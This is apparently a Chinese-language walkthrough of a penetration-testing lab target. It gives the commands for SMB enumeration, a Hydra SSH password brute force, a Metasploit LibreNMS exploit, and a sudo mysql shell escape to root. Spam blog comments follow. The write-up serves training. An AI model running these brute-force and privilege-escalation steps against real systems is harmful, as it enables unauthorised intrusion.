渗透流程
1.扫描
- NMAP
2.枚举
- Enum4Linux
3.渗透
- Smbclient
- Hydra
- Msfconsole
4.提权
- Exploiting Sudo rights
详情记录
扫描:
Nmap扫描

扫描80端口打开并有smb服务,先尝试web服务

尝试在web服务进一步爆路径,尝试后没有任何发现。
进一步使用enum4liunx进行smb扫描,发现名为anonymous的共享

使用smbclient进行连接
smbclient –L 192.168.1.102
smbclient //192.168.1.102/anonymous
ls
cd backups
get log.txt


可以发现公开目录下有backup文件夹,进去之后有log.txt取回本地

发现名为aeolus的用户名,准备进行爆破
漏洞利用:
使用hydra进行密码尝试
hydra –l aeolus –P /usr/share/wordlists/rockyou.txt 192.168.1.102 ssh

得到密码后使用msfconsole进行登录

成功登录靶机后查看网络配置信息

发现8080端口正在使用,通过对本机ifconfig,发现127.0.0.1仅本机开放,故切换思路,将其转发至攻击机4443端口

攻击机尝试打开web服务

使用LibreNMS管理工具,对其exp进行搜索

使用addhost漏洞转到metasploit进行攻击

拿到bash后进行下一步提权
提权:
check一下用户权限,发现可以使用mysql无密码执行,进而使用mysql进行提权
sudo –l
sudo mysql -e '\! /bin/sh'
id
cd /root
cat proof.txt

进而cat proof完成攻击
Comments | 5 条评论
After looking over a few of the articles on your blog, I honestly like your technique of writing a blog. I book-marked it to my bookmark site list and will be checking back in the near future. Please check out my website as well and tell me your opinion. Hedy Johnathan Chiquia
I want gathering useful information , this post has got me even more info! . Saree Ulrich Salvucci
Thankfulness to my father who stated to me regarding this website, this webpage is genuinely awesome. Alisha Franny Hassett
I do agree with all the ideas you have presented in your post. They are very convincing and will definitely work. Still, the posts are very short for novices. Could you please extend them a bit from next time? Thanks for the post. Gisela Baryram Orpha
This is an excellent point. Any reputable organization at all would indeed distance themselves from her vile comments to others. That Scientology lets her continue to lash out the way she does without saying a word says as much about them as it does about her. Joana Gerhardt Echikson